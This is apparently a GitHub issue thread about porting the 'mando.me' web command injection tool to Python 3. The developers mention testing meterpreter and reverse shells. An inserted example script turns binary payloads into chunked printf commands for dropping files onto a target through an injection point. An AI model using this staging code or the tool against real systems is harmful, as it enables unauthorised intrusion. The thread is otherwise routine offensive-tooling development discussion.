z0noxz / mando.me

Web Command Injection Tool
10 stars, 9 forks

Query: #1

Open NovaCygni opened 7 years ago

NovaCygni commented 7 years ago

Just glanced over the code, nice job, looks very good overall, though I was curious as to why you went with Python 2 and not Python 3?

z0noxz commented 7 years ago

Haven't "got the time" to convert it yet. Maybe I'll have a look tomorrow. Initially I think I went for backwards compatibility, but I think almost everyone has py3 now... so probably not a good argument :)

NovaCygni commented 7 years ago

Well, from a quick check, you can likely just 2to3 the code, sort out the few issues with changes to syntax for the 'Expected type Dict, got List:Dict instead' and it should be ready to go. Nice project btw, nice to see people being innovative.

z0noxz commented 7 years ago

So I began the conversion from py2 to py3, but in doing so I found an error or security feature preventing the "echo -ne" from working. So I have started to change this method to first echo 0x00, 0x01... to the server and then loop 0-255 converting each hex to ASCII using sed. This seems to work, and I would perhaps have a new version ready in a few minutes or an hour using this method and py3.
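The problem z0noxz hits above is common: `echo -ne` is a bash extension, and on targets where `/bin/sh` is dash (Debian, Ubuntu) the builtin echo prints `-ne` literally and only understands octal escapes, so a hex-escaped payload never lands on disk intact. The block below is an added example, not mando.me's code and not the echo/sed loop the comment describes; it swaps in POSIX `printf` with three-digit octal escapes, which `/bin/sh`, dash and bash all honour. It generates the injected commands from Python, chunks them so no single command grows too long, and includes an offline decoder plus an optional local round trip through `/bin/sh`. The payload bytes and the destination path are constructed for the example.

```python
from __future__ import annotations

import os
import shlex
import subprocess
import tempfile

# Constructed sample payload: the start of an ELF header followed by every
# byte value, exactly the kind of content `echo` mangles (NULs, high bytes).
SAMPLE_PAYLOAD = b"\x7fELF\x02\x01\x01\x00" + bytes(range(0, 256))


def printf_octal(data: bytes) -> str:
    """Encode bytes as printf format-string octal escapes, always three digits.

    Three digits per byte means a following digit can never be absorbed into
    the escape, and since no '%' is ever emitted nothing needs doubling.
    """
    return "".join(f"\\{b:03o}" for b in data)


def stage_commands(data: bytes, dest: str, chunk_size: int = 64) -> list[str]:
    """Return one printf command per chunk that together recreate data in dest.

    The first command truncates with '>' and the rest append with '>>', so a
    re-run never leaves stale bytes behind. chunk_size bounds the length of
    each injected command (each byte costs four format characters). dest is
    quoted with shlex.quote so unusual paths survive the target's shell.
    """
    if chunk_size <= 0:
        raise ValueError("chunk_size must be positive")
    target = shlex.quote(dest)
    cmds = []
    for offset in range(0, len(data), chunk_size):
        redirect = ">" if offset == 0 else ">>"
        fmt = printf_octal(data[offset:offset + chunk_size])
        cmds.append(f"printf '{fmt}' {redirect} {target}")
    if not cmds:
        cmds.append(f": > {target}")  # empty payload still creates the file
    return cmds


def decode_printf_octal(fmt: str) -> bytes:
    """Python-side model of what printf emits for a printf_octal() string.

    Lets the encoder be checked offline; only \\ooo escapes are accepted.
    """
    out = bytearray()
    i = 0
    while i < len(fmt):
        if fmt[i] != "\\" or len(fmt) < i + 4:
            raise ValueError(f"malformed escape at offset {i}")
        out.append(int(fmt[i + 1:i + 4], 8))
        i += 4
    return bytes(out)


def run_locally(data: bytes, shell: str = "/bin/sh") -> bytes:
    """Run the staged commands in a scratch directory with the given shell and
    return what landed on disk. Stands in for the remote injection point."""
    with tempfile.TemporaryDirectory() as tmp:
        dest = os.path.join(tmp, "payload with space.bin")
        script = "\n".join(stage_commands(data, dest))
        subprocess.run([shell, "-c", script], check=True)
        with open(dest, "rb") as fh:
            return fh.read()


if __name__ == "__main__":
    cmds = stage_commands(SAMPLE_PAYLOAD, "/tmp/payload.bin")
    print(f"{len(cmds)} commands, first one:\n{cmds[0]}")
    assert decode_printf_octal(printf_octal(SAMPLE_PAYLOAD)) == SAMPLE_PAYLOAD
    if os.path.exists("/bin/sh"):
        ok = run_locally(SAMPLE_PAYLOAD) == SAMPLE_PAYLOAD
        print("round trip via /bin/sh OK" if ok else "round trip mismatch")
```

Each generated command is self-contained, so it can be sent through an injection point one request at a time; the format string sits inside single quotes so the target shell passes the backslashes to printf untouched. If the injection point has its own length limit, lower `chunk_size` (four characters per byte plus the fixed command prefix gives the exact size).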

z0noxz commented 7 years ago

Quick update: I found some strange errors in the embedded PHP code that took me forever to identify (due to it being encrypted). I think they are related to a newer version of PHP (in regards to HTTP variables not being allowed to contain '_'), which is different from the one in Metasploitable that I have been testing on before. So I haven't completed the py2->py3 yet due to this obstacle, but hopefully tomorrow!

z0noxz commented 7 years ago

So I have ported the code to Python 3. I had to do a lot of changes to get it running, and then some more to get the external payloads to execute correctly. I have tested meterpreter and reverse shell spawning (it works, though I had to change rev-shell to 'bash' instead of 'sh'). I currently don't have my lab environment up and running so I haven't been able to test everything, as my own environment doesn't allow a lot of the exploits (pew).

NovaCygni commented 7 years ago

I'll fire it up and test it now +1

NovaCygni commented 7 years ago

OK, well, good and bad news. The good news is it's "mostly" working; the bad news is there are still a few minor errors. If you want I can Pastebin the source code with ##+Error## for you... it's mostly little things like: unresolved attribute reference for class Linux/Windows, unresolved attribute for self.socket for class shell. Or feel free to pop into the IRC BlackArch channel and I can just talk you through it.

z0noxz commented 7 years ago

Drop a pastebin, I have some errands to run. Maybe I'll see you on IRC later.

NovaCygni commented 7 years ago

https://pastebin.com/pZuRz7rp I've added #+Error# to every line/section with errors. After a quick check with PyCharm it turns out you have more than a few errors, with 3, maybe 4, critical ones. Anyhow, I'll see you in the IRC channel and talk you through it then... it's all trials and tribulations I had to go through myself back in the day :+1:

z0noxz commented 7 years ago

Nice, I'll have a look later. PyCharm seems to do a good job at finding errors.

NovaCygni commented 7 years ago

Yeah, really you should be using it, it'll save you a TON of time and it's exceptional for debugging scripts, even more so when you start playing around with async code ;o

z0noxz commented 7 years ago

I only use nano in one terminal and run the script in another terminal... so yeah, PyCharm might help me a bit XD